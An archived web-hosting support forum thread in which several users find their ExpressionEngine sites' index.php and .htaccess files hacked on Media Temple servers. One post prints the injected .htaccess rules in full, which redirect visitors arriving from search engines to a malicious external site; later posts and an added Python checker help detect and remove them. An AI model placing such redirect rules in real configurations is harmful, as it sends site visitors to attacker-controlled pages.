
This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.


Parse error: syntax error, unexpected T_STRING

November 12, 2009 10:50pm

  • #1 / Nov 12, 2009 10:50pm

    Minakami_Mike

    4 posts

    My website has recently started showing the following error:

    Parse error: syntax error, unexpected T_STRING in /nfs/username/domains/tourism-minakami.com/html/index.php on line 60

    I have not changed anything for the past 4 months?  The site is still able to be viewed from:

    http://www.tourism-minakami.com/en/

    but the error occurs from:
    http://www.tourism-minakami.com/

    Help please!

    Mod Edit: Removed server username for security reasons.

  • #2 / Nov 13, 2009 2:24am

    John Henry Donovan

    12339 posts

    Minakami_Mike,

    Check the tourism-minakami.com/html/index.php file or your htaccess file for any malicious code.

    Please review this thread and let us know if it sounds familiar.

    We take security very seriously so if it does then we will do our best to work with you on figuring out what’s going on.

  • #3 / Nov 13, 2009 4:36am

    Minakami_Mike

    4 posts

    Hi John,

    I changed the index.php to an old version and the problem has been resolved.

    I am also on Media Temple and it seems that my index.php and .htaccess have been changed on Nov 5.  It seems to be related to the Media Temple servers?

  • #4 / Nov 13, 2009 5:04am

    Ingmar

    29245 posts

    Yes, it seems to be related to the recent security breach on MT servers. Please do contact their support. Change all your passwords, check .htaccess and replace all of your EE files with known good copies.

  • #5 / Nov 14, 2009 5:21am

    Minakami_Mike

    4 posts

    My current .htaccess looks like the text below.  Can someone tell me what is malicious and what it should look like?

    # rewrite rules
    RewriteEngine On
    
    # ditch index.php
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)$ index.php/$1 [L]
    
    AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
    
    
    
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
    RewriteRule .* http://you-search.in/in.cgi?4&parameter=sf [R,L]

  • #6 / Nov 14, 2009 11:10am

    Greg Salt

    3988 posts

    Hi Minakami_Mike,

    Your .htaccess file does not look correct. This section:

    AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm

    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
    RewriteRule .* http://you-search.in/in.cgi?4&parameter=sf [R,L]

    looks as if it has been added and the RewriteRule at the end does point to a known malicious site. Please remove these lines and then report this to MT support and ask them to check that the permissions are appropriate for your files including your .htaccess file.

    Cheers

    Greg
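
Added example, not part of the original thread and not EllisLab or Media Temple code: a small Python check for the two kinds of directive flagged in post #6, a PHP handler mapped onto non-.php extensions and a RewriteRule that redirects to an external host only when the Referer matches. The function name `audit_htaccess`, the constructed sample and the placeholder redirect host are assumptions made for illustration.

```python
import re

# Constructed sample modelled on the file posted in this thread; the redirect
# target is replaced with a placeholder host.
SAMPLE = """\
# ditch index.php
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L]
AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC]
RewriteRule .* http://redirect.example.invalid/in.cgi?4 [R,L]
"""

PHP_HANDLER = re.compile(r"^(AddHandler|AddType)\s+\S*php\S*\s+(.+)$", re.I)
COND = re.compile(r"^RewriteCond\s+(\S+)", re.I)
RULE = re.compile(r"^RewriteRule\s+\S+\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def audit_htaccess(text):
    """Return (line_no, finding) tuples for directives worth a manual look."""
    findings, pending_conds = [], []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if m := PHP_HANDLER.match(line):
            extra = [e for e in m.group(2).split() if e.lower() != ".php"]
            if extra:
                findings.append((no, "PHP handler on non-.php extensions: " + " ".join(extra)))
        elif m := COND.match(line):
            pending_conds.append(m.group(1).upper())
        elif m := RULE.match(line):
            target, flags = m.group(1), (m.group(2) or "").upper().split(",")
            external = re.match(r"https?://", target, re.I) is not None
            redirect = any(f.strip().startswith("R") for f in flags)
            if external and redirect and "%{HTTP_REFERER}" in pending_conds:
                findings.append((no, "Referer-gated redirect to " + target))
            pending_conds = []  # conditions apply only to the next RewriteRule
    return findings


if __name__ == "__main__":
    for no, finding in audit_htaccess(SAMPLE):
        print(f"line {no}: {finding}")
```

A hit is a prompt for manual review against a known good copy of the file, since the legitimate "ditch index.php" rule in the same file passes cleanly while the appended block does not.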

  • #7 / Nov 18, 2009 7:26pm

    richhayler

    53 posts

    Exact same thing happened to me -  on Media Temple, hacked index.php and .htaccess file on all my EE sites.

  • #8 / Nov 18, 2009 7:38pm

    Adam Dorsey

    1439 posts

    @rmhayler

    We take security very seriously here at EllisLab. Can you report your attack to Media Temple, and follow up with us?

    Thanks!

  • #9 / Nov 18, 2009 11:08pm

    Minakami_Mike

    4 posts

    Below is the reply I received from Media Temple:

    Michael,

    The permissions on those files appear to be correct.

    I would recommend simply updating your passwords, as well as updating to the latest version of Expression Engine, including all plugins or any other modifications to the software.

    If you have any further questions regarding your (mt) Media Temple servers, please let us know.

    Best Regards,

    Julian N.
    Customer Support
    (mt) Media Temple
    <v> 877-578-4000
    <f> 310-564-2007
    User Forums: http://kb.mediatemple.net/questions/824/

  • #10 / Nov 19, 2009 3:46am

    Ingmar

    29245 posts

    Yes, it’s pretty standard advice, but still a good idea. There has been a series of incidents of this nature at MT recently.

  • #11 / Nov 23, 2009 3:47pm

    kev_horan

    50 posts

    Hi -

    I’ve just had the same issue on an MT hosted site. I’ve regenerated my .htaccess file, updated my passwords and removed the offending code from the index file. I’m also reporting to MediaTemple.

    Should I re-upload the system files? Are there any risks with regard to losing work done?

    thanks
    Kevin

  • #12 / Nov 23, 2009 3:51pm

    Ingmar

    29245 posts

    Should I re-upload the system files? Are there any risks with regard to losing work done?

    I would recommend it, upgrading to the latest version/build in the process. All of your EE related work (templates, entries etc) is stored in the database.

  • #13 / Nov 23, 2009 5:42pm

    kev_horan

    50 posts

    I’ve updated my EE install and done everything suggested - thanks for the help. There are a couple of static sites on the same MT account, and their index files had the malicious code inserted too, as well as a couple of WordPress installs.

  • #14 / Nov 23, 2009 5:43pm

    Ingmar

    29245 posts

    Thanks for letting us know, kev_horan. We appreciate the feedback.

  • #15 / Nov 23, 2009 5:46pm

    justjess

    16 posts

    This happened to at least 6 client sites as well as several of my own hosted on MT’s grid servers. The official line from MediaTemple for me was that I need to take every step to use secure passwords and that all php code is vulnerable.

    I do not believe that this is a case of poor password choice - this is happening to swarms of people all over the grid.

    MT sent me this info about using phpsecinfo

    http://kb.mediatemple.net/questions/1700/Increase+PHP+security+with+phpsecinfo

    and they have an injection article on their KB as well

    http://kb.mediatemple.net/questions/1715/Working+with+a+php+injected+website

    I think at a certain point they are going to have to admit some responsibility for these attacks, but in the meantime, I’m trying to figure out what else I can do on my end.

    Hope this helps,
    Jess
